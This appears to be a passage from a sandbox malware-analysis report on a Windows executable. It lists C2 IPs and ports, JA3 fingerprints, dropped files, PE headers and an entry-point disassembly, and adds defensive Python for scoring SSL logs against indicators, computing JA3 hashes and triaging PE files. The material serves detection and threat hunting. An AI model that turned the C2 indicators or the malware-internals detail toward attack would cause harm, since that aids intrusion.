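# ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, ja3.
# 93.184.216.34 stands in for a benign destination; the all-'a' JA3 is a placeholder.
SSL_LOG = "\n".join([
    "1615800001.10\tC1\t10.0.0.5\t49210\t80.86.91.232\t4143\t51c64c77e60f3980eea90869b68c58a8",
    "1615800002.20\tC2\t10.0.0.5\t49211\t80.86.91.232\t8080\t51c64c77e60f3980eea90869b68c58a8",
    "1615800003.30\tC3\t10.0.0.7\t49300\t93.184.216.34\t443\t51c64c77e60f3980eea90869b68c58a8",
    "1615800004.40\tC4\t10.0.0.9\t49400\t178.62.39.238\t443\taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
    "1615800005.50\tC5\t10.0.0.9\t49401\t93.184.216.34\t443\taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
])


def score_ssl_log(log: str, ip_ports: Set[Tuple[str, int]], ja3s: Set[str]) -> List[Tuple[str, str, List[str]]]:
    """Return (uid, confidence, reasons) for each log line.

    An exact C2 IP:port hit is high confidence, the C2 host on an unlisted port
    is medium, and a JA3-only hit is low: a fingerprint shared by many unrelated
    samples identifies the TLS client stack, not the malware family."""
    ips = {ip for ip, _ in ip_ports}
    results = []
    for line in log.splitlines():
        fields = line.split("\t")
        if len(fields) != 7:
            continue  # malformed or header line
        _, uid, _, _, resp_h, resp_p, ja3 = fields
        endpoint_hit = (resp_h, int(resp_p)) in ip_ports
        host_hit = resp_h in ips
        ja3_hit = ja3 in ja3s
        reasons = []
        if endpoint_hit:
            reasons.append(f"known C2 endpoint {resp_h}:{resp_p}")
        elif host_hit:
            reasons.append(f"known C2 host {resp_h} on unlisted port {resp_p}")
        if ja3_hit:
            reasons.append(f"known JA3 {ja3}")
        if endpoint_hit:
            confidence = "high"
        elif host_hit:
            confidence = "medium"
        elif ja3_hit:
            confidence = "low"
        else:
            confidence = "none"
        results.append((uid, confidence, reasons))
    return results


if __name__ == "__main__":
    iocs = parse_ip_contexts(IP_CONTEXT_RAW)
    ja3s = parse_ja3_matches(JA3_CONTEXT_RAW)
    for uid, confidence, reasons in score_ssl_log(SSL_LOG, iocs, ja3s):
        print(uid, confidence, "; ".join(reasons))
```

Two points worth keeping when this is turned into a real rule: the same host appears with several listening ports (4143 and 7080 for 80.86.91.232), so blocking or alerting on the host rather than a single IP:port pair catches the rotation; and a JA3 hash that the report associates with a long list of different samples is a weak signal on its own, which is why the scorer never rates a JA3-only hit above low.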

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
51c64c77e60f3980eea90869b68c58a8 | cEZGHOTI9M.dll | malicious | 167.114.153.153
51c64c77e60f3980eea90869b68c58a8 | cEZGHOTI9M.dll | malicious | 167.114.153.153
51c64c77e60f3980eea90869b68c58a8 | VRREYtOlaw.dll | malicious | 167.114.153.153
51c64c77e60f3980eea90869b68c58a8 | VRREYtOlaw.dll | malicious | 167.114.153.153
51c64c77e60f3980eea90869b68c58a8 | 9BctgN1cuV.dll | malicious | 167.114.153.153
51c64c77e60f3980eea90869b68c58a8 | 9BctgN1cuV.dll | malicious | 167.114.153.153
51c64c77e60f3980eea90869b68c58a8 | ENSZQNEEuN.dll | malicious | 167.114.153.153
51c64c77e60f3980eea90869b68c58a8 | ENSZQNEEuN.dll | malicious | 167.114.153.153
                                                                                                                                                BGvrz0jcwz.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                BGvrz0jcwz.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                WN6Lq0spUU.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                WN6Lq0spUU.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                tWeWr7k3cy.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                tWeWr7k3cy.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                0ZvReoyBhP.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                0ZvReoyBhP.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                3A4jLXA7Ur.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                3A4jLXA7Ur.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                q61RDjJwNE.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
                                                                                                                                                q61RDjJwNE.dllGet hashmaliciousBrowse
                                                                                                                                                • 167.114.153.153
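
The JA3 value in the Match column is not a hash of the sample. It is the MD5 of the TLS parameters the client put in its ClientHello, so every program that drives the same TLS stack with the same settings produces the same fingerprint; the associated samples share it together with the context IP 167.114.153.153. That makes JA3 a pivot for hunting related traffic, not a signature on its own. The following added example (not code from the report or from Joe Sandbox) computes the JA3 string and hash from a raw ClientHello record; the record itself, the hostname example.test and the cipher, group and extension choices are constructed for the example and describe no sample in the report.

```python
"""JA3 fingerprint of a TLS ClientHello, computed the way the "Match" value
above is derived: the MD5 of
    SSLVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats
taken from the ClientHello, with GREASE values removed.
Added example; not part of the Joe Sandbox report."""
import hashlib
import struct

# GREASE values 0x0a0a, 0x1a1a, ..., 0xfafa (RFC 8701) are dropped by JA3.
GREASE = {(x << 8) | x for x in range(0x0A, 0x100, 0x10)}


def _u16_list(blob: bytes) -> list:
    return [v for (v,) in struct.iter_unpack("!H", blob)]


def ja3_from_client_hello(record: bytes) -> tuple:
    """Return (ja3_string, ja3_md5) for one TLS record carrying a ClientHello."""
    if record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    version = struct.unpack("!H", body[0:2])[0]
    pos = 2 + 32                                    # client_version + random
    pos += 1 + body[pos]                            # session_id
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    ciphers = [c for c in _u16_list(body[pos:pos + cs_len]) if c not in GREASE]
    pos += cs_len
    pos += 1 + body[pos]                            # compression_methods
    exts, groups, formats = [], [], []
    if pos < len(body):                             # extensions block is optional
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos < end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            edata = body[pos + 4:pos + 4 + elen]
            pos += 4 + elen
            if etype in GREASE:
                continue
            exts.append(etype)
            if etype == 0x000A:                     # supported_groups
                n = struct.unpack("!H", edata[:2])[0]
                groups = [g for g in _u16_list(edata[2:2 + n]) if g not in GREASE]
            elif etype == 0x000B:                   # ec_point_formats
                formats = list(edata[1:1 + edata[0]])
    ja3 = ",".join([str(version),
                    "-".join(map(str, ciphers)),
                    "-".join(map(str, exts)),
                    "-".join(map(str, groups)),
                    "-".join(map(str, formats))])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def build_client_hello(version: int, ciphers: list, extensions: list) -> bytes:
    """Serialise a ClientHello (zeroed random, empty session id) into a TLS record.
    extensions is a list of (type, already-encoded data) pairs."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                             # one compression method: null
    ext_bytes = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext_bytes)) + ext_bytes
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


def sample_ja3() -> tuple:
    """Fingerprint a ClientHello constructed here; the parameters are invented
    and do not describe any sample in the report."""
    groups = [0x2A2A, 0x001D, 0x0017, 0x0018]       # GREASE, x25519, secp256r1, secp384r1
    groups_data = struct.pack("!H", 2 * len(groups)) + b"".join(struct.pack("!H", g) for g in groups)
    sni = b"example.test"
    sni_data = struct.pack("!HBH", len(sni) + 3, 0, len(sni)) + sni
    extensions = [
        (0x0A0A, b""),                              # GREASE extension, excluded
        (0x0000, sni_data),                         # server_name
        (0x000A, groups_data),                      # supported_groups
        (0x000B, b"\x01\x00"),                      # ec_point_formats: uncompressed
        (0x0023, b""),                              # session_ticket
    ]
    ciphers = [0x3A3A, 0x1301, 0x1302, 0xC02B, 0xC02F]   # GREASE first, then real suites
    return ja3_from_client_hello(build_client_hello(0x0303, ciphers, extensions))


if __name__ == "__main__":
    ja3_str, ja3_md5 = sample_ja3()
    print(ja3_str)   # 771,4865-4866-49195-49199,0-10-11-35,29-23-24,0
    print(ja3_md5)
```

Because GREASE values are stripped before hashing, a client that randomises its GREASE placeholders still yields a stable JA3; because ordering is preserved, two clients offering the same suites in a different order yield different hashes. When pivoting on a fingerprint such as the one above, check how many benign processes in the environment produce it before treating a match as malicious.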

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 24576
Entropy (8bit): 0.36205444996716485
Encrypted: false
SSDEEP: 48:UtcctcMtcctcMtcctcMtcctcQtcctc0tcctc:UtTtDtTtDtTtDtTtTtTtbtTt
MD5: 353C0E84A6C573D30B15481706263B9A
SHA1: 4DCBF5ED97F1251EEF6E0747906368AB5639D0FA
SHA-256: 4412C6044B8C975D5BAB1F0E173339AE2A091A3B4D2DFBF771F1E9B854EF1751
SHA-512: 210B6E533923CF5F3FE255C39E1B2D243F675D2C022FA613E3ABD680FB552A2FD9079BF1699C91A5033AED47E29EE0191CF6E307429554A3128D2C009E047AFD
Malicious: false
                                                                                                                                                Preview: .............'..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................).............................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\edb.log
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.24097992741802837
Encrypted: false
SSDEEP: 12:0iGaD0JcaaD0JwQQSAg/0bjSQJkTXVPV15VPV1:0ugJctgJwPrjSukT7D
MD5: E685F3F1F4748BE770F382EAB21642AA
SHA1: 45BD6CFC60352A3A72A28D0DD8958A518356CE1D
SHA-256: A2EA73F08386C4C35B63FC06D636BC53D8D494E25EB036791F3E78ED2C827E44
SHA-512: B268B5C822127A71B4F60EE850E99C348A7C4A933454E458C0106A7924C25E55BCD2BBF35F271681B05427B1956DAFC2204F347F89E9B5F60382D3768323DFB7
Malicious: false
                                                                                                                                                Preview: ......:{..(.....6....y).............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................6....y)...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x364932a2, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 131072
Entropy (8bit): 0.09734258485403852
Encrypted: false
SSDEEP: 12:z0+9O4blLeK10+9O4blLeKBI0+9O4blxXseKBI0+9O4blxXseKl9G0+9O4blZXs1:IvUk6kWxIGxIFn
MD5: D790E163439238FFDA1622E1D2F93BCB
SHA1: F84769BF5818F7C839D2DD2E1BEDFC0B598D3577
SHA-256: 70A5D08C046DE0C7A36E8EFB5ACC5EA614996C08DBB2868BEF8FF818979BA3EE
SHA-512: 0EBF60CF15259FECD40FD3A3CCCD808A66A0D4AE80B3116DF5018BB14F27E898A62346CA9E22441A35FC3FEB87CFF2C47C0AF19E38C6418572A871EE3FC0B9B9
Malicious: false
                                                                                                                                                Preview: 6I2.... ................e.f.3...w........................&..........w..6....y).h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................p..a6....y)k................h..`6....y).........................................................................................................................................................................................................................................................................................................................................................................................
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 32768
Entropy (8bit): 0.11610120210156388
Encrypted: false
SSDEEP: 6:9Yci8t4/aXXlici80gCX5AaJici8t5lXF6mdAVm1JrRJxlXzA:9DJt4/GXlVJdCXRVJtXXF6m0mfX
MD5: 1A68F60E8E60992962A09BFFDCD366F8
SHA1: 0FDFB6974363191995F8426E33E2114582FA53B7
SHA-256: 8263FBE2DCF6314BC4483E250492EBFB7C87905E5BD35A7A5E1902CCE49321A2
SHA-512: 3748CEC8ABDB2A41C9A4BC557BF1FB692922C9F4A650D2EB824B5486AFBBA5667BF8DE618DB5772AB94CB33883F0FD5A4ED61D199BEEDA2ABBC23EE17E488AAF
Malicious: false
                                                                                                                                                Preview: N.......................................3...w..6....y)......w...............w.......w....:O.....w..................h..`6....y).........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Process: C:\Windows\System32\svchost.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 55
Entropy (8bit): 4.306461250274409
Encrypted: false
SSDEEP: 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5: DCA83F08D448911A14C22EBCACC5AD57
SHA1: 91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256: 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512: 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious: false
Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
Process: C:\Program Files\Windows Defender\MpCmdRun.exe
File Type: data
Category: modified
Size (bytes): 906
Entropy (8bit): 3.145512419544203
Encrypted: false
SSDEEP: 12:58KRBubdpkoF1AG3rZvTk9+MlWlLehB4yAq7ejC4v+:OaqdmuF3rq+kWReH4yJ7Ms
MD5: F3C639B4A0934C30F7C0F48DCF565F1D
SHA1: C1F38DE44C0466DFE983EFD5FE49F9B06188F8BC
SHA-256: 7C1EA10956B819F7F7C52BB7E4AF95918E86D00C842FCD0A58B4EEDF4449EBAA
SHA-512: CD4FB1A18D2ECADDBBB62815DEBCEC277773317CB3E97ECD90304BF2C1B6D0A82615FEF5FA6160FCF335E8E4CB42607A473A55DFE9C128FC16817FD31919B55D
Malicious: false
                                                                                                                                                Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.u.n. .. M.a.r. .. 2.8. .. 2.0.2.1. .1.9.:.3.0.:.0.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.u.n. .. M.a.r. .. 2.8. .. 2.0.2.1. .1.9.:.3.0.:.0.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 471
Entropy (8bit): 7.2157743595441834
Encrypted: false
SSDEEP: 12:JG5UglqmzwOXLeS24UZjmwn8kEUGyMQ+IW:JGXbzjXaS2h0sNiBIW
MD5: 117E696DDA2887D0CF3D371C0F0F5CDB
SHA1: 3287572A71E3F9AB1A726135CD6D9547171D587D
SHA-256: 040D1EBE3056B0A05637DED2272913180A065F16C487C9038533DDDF3959BCD8
SHA-512: D8BB16A987F95D55560BC8636C3C06FB767487C7BADD33E7C58975BE1473C81C84AE90682C2F4E6CEE06557244B21AA889A801A5AEBF26821A9836F9926013AC
Malicious: false
                                                                                                                                                Preview: 0..........0.....+.....0......0...0........a..1a./(.F8.,......20210327173302Z0s0q0I0...+........._.z....'.5..C.........a..1a./(.F8.,.......m..a.)0.3..]r....20210327173302Z....20210403164802Z0...*.H................X5$.{A9...#tFB}...,sg...r.mWe.....-.`.J!.....9...*T...w..vh...L.hm2.c.:....59.B.@Ds"P7..=..Y!.i...G>..E5).._)N)... ....}j...6tgmu.K......]...vc.u.....MC.......7.1.H.....35.{z..D....R...}>(....K.m.jA....y^l.P....Y,u.!.E.;8B^ssi......O..d`ms
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 852
Entropy (8bit): 3.781409429240517
Encrypted: false
SSDEEP: 24:+29smxxvPbJ/GJsRmh0H9smxxvPbJ/GJsRf:FaQCoHaQCof
MD5: 5E325F7AD3A4E5DD97AF07B0E556E7AC
SHA1: CCB4FC7DB8177DE4206B6606C2D46A2A18C69B6B
SHA-256: B25C7CB8409E684756BADC0E64B12A1087A6355F06A8CC93090776D675571A8E
SHA-512: 1FA5514EF75FE357E3FC08532A95FFFD990CFBF8999ECB769BC32F0FC3DE36F501718B92454E35F1643336CE440212FCD5C92DA590EDE225E0231FDE7E2084E9
Malicious: false
                                                                                                                                                Preview: p...... ........8...C$..(....................................................... ........[.</#..sX..................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.Q.X.6.Z.6.g.A.i.d.t.S.e.f.N.c.6.D.C.0.O.I.n.q.P.H.D.Q.Q.U.D.4.B.h.H.I.I.x.Y.d.U.v.K.O.e.N.R.j.i.0.L.O.H.G.2.e.I.C.E.A.h.t.5.a.O.I.r.W.G.A.K.T.C.h.M.x.L.x.X.X.I.%.3.D...".6.0.5.f.6.c.4.e.-.1.d.7."...p...... ........8...C$..(................[.</#...MK..(...................MK..(.. ........[.</#..sX..................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.Q.Q.X.6.Z.6.g.A.i.d.t.S.e.f.N.c.6.D.C.0.O.I.n.q.P.H.D.Q.Q.U.D.4.B.h.H.I.I.x.Y.d.U.v.K.O.e.N.R.j.i.0.L.O.H.G.2.e.I.C.E.A.h.t.5.a.O.I.r.W.G.A.K.T.C.h.M.x.L.x.X.X.I.%.3.D...".6.0.5.f.6.c.4.e.-.1.d.7."...

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):6.436116781781946
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:yxghUyIGb4.exe
                                                                                                                                                File size:45568
                                                                                                                                                MD5:ecbc4b40dcfec4ed1b2647b217da0441
                                                                                                                                                SHA1:e08eb07c69d8fc8e75927597767288a21d6ed7f6
                                                                                                                                                SHA256:878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
                                                                                                                                                SHA512:3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
                                                                                                                                                SSDEEP:768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:00828e8e8686b000

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x409ee0
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                                                Time Stamp:0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:5
                                                                                                                                                OS Version Minor:1
                                                                                                                                                File Version Major:5
                                                                                                                                                File Version Minor:1
                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                Import Hash:4cfe8bbfb0ca5b84bbad08b043ea0c87

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                push esi
                                                                                                                                                push 0040C1F0h
                                                                                                                                                push 3966646Ch
                                                                                                                                                push 00000009h
                                                                                                                                                mov ecx, D22E2014h
                                                                                                                                                call 00007FB6C8A792FEh
                                                                                                                                                mov edx, 004011F0h
                                                                                                                                                mov ecx, eax
                                                                                                                                                call 00007FB6C8A79222h
                                                                                                                                                add esp, 0Ch
                                                                                                                                                mov ecx, 8F7EE672h
                                                                                                                                                push 0040C0D0h
                                                                                                                                                push 6677A1D2h
                                                                                                                                                push 00000048h
                                                                                                                                                call 00007FB6C8A792D9h
                                                                                                                                                mov edx, 004010D0h
                                                                                                                                                mov ecx, eax
                                                                                                                                                call 00007FB6C8A791FDh
                                                                                                                                                add esp, 0Ch
                                                                                                                                                push 08000000h
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [0040C1A8h]
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [0040C10Ch]
                                                                                                                                                mov esi, eax
                                                                                                                                                test esi, esi
                                                                                                                                                je 00007FB6C8A81638h
                                                                                                                                                push 08000000h
                                                                                                                                                push 00000000h
                                                                                                                                                push esi
                                                                                                                                                call dword ptr [0040C1F8h]
                                                                                                                                                add esp, 0Ch
                                                                                                                                                push esi
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [0040C1A8h]
                                                                                                                                                push eax
                                                                                                                                                call dword ptr [0040C1E8h]
                                                                                                                                                call 00007FB6C8A78C5Ah
                                                                                                                                                push 00000000h
                                                                                                                                                call dword ptr [0040C1ACh]
                                                                                                                                                pop esi
                                                                                                                                                ret
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                int3
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                sub esp, 0Ch
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                mov edi, edx
                                                                                                                                                mov dword ptr [ebp-0Ch], ecx
                                                                                                                                                mov esi, 00000001h
                                                                                                                                                mov dword ptr [ebp-08h], esi
                                                                                                                                                mov eax, dword ptr [edi]
                                                                                                                                                cmp eax, 7Fh
                                                                                                                                                jbe 00007FB6C8A81621h
                                                                                                                                                lea ecx, dword ptr [ecx+00h]
                                                                                                                                                shr eax, 07h
                                                                                                                                                inc esi
                                                                                                                                                cmp eax, 7Fh

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [LNK] VS2013 UPD4 build 31101
                                                                                                                                                • [IMP] VS2008 SP1 build 30729

                                                                                                                                                Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbad0           0x28          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd000           0x5cc         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xb000           0x8           .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                                                                Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x9883        0x9a00    False     0.503297483766   data       6.45508103349  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0xb000           0xb2e         0xc00     False     0.160807291667   data       4.23495809712  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0xc000           0xbd8         0x200     False     0.123046875      data       0.91267432928  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc  0xd000           0x5cc         0x600     False     0.8671875        data       6.49434732961  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Imports

DLL           Import
KERNEL32.dll  WTSGetActiveConsoleSessionId
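What the static sections above add up to, read together: a 45 KB PE32 with ASLR and NX enabled, an entry point inside .text, .text entropy of 6.46 (ordinary compiled code, not a packed blob), an import directory of 0x28 bytes (one descriptor plus the terminating null one) and exactly one static import, KERNEL32.dll!WTSGetActiveConsoleSessionId. A Windows program that does anything at all needs far more than that, and the entry-point preview, which loads 32-bit constants such as 3966646Ch and D22E2014h before each call, is consistent with the report's own signature "Contains functionality to dynamically determine API calls": the real API set is resolved at runtime, and the Import Hash line therefore describes the loader stub, not the payload. The following is an added example, stdlib-only Python written for this page rather than code from Joe Sandbox or from the sample, that reproduces this triage from raw bytes: it parses the PE32 headers, sections and data directories, walks the import directory, computes per-section entropy and an import hash using the pefile get_imphash() convention (lowercased "dll.func", DLL extension dropped, comma-joined, MD5), and flags a tiny import table. Because the sample itself is not reproduced here, build_sample_pe() constructs a minimal two-section PE32 with that same single import as the input; its byte values are constructed for the example and are not the sample's.

```python
"""Stdlib-only PE32 triage: entry point, DllCharacteristics, section entropy,
data directories and the import table, with a flag for tiny import tables."""
import hashlib
import math
import struct
from collections import Counter, namedtuple

Section = namedtuple("Section", "name va vsize raw_size raw_ptr chars")


def entropy(buf):
    """Shannon entropy in bits per byte (the report's per-section Entropy column)."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def parse_pe(data):
    """Return (entry_rva, dll_characteristics, data_directories, sections) of a PE32."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
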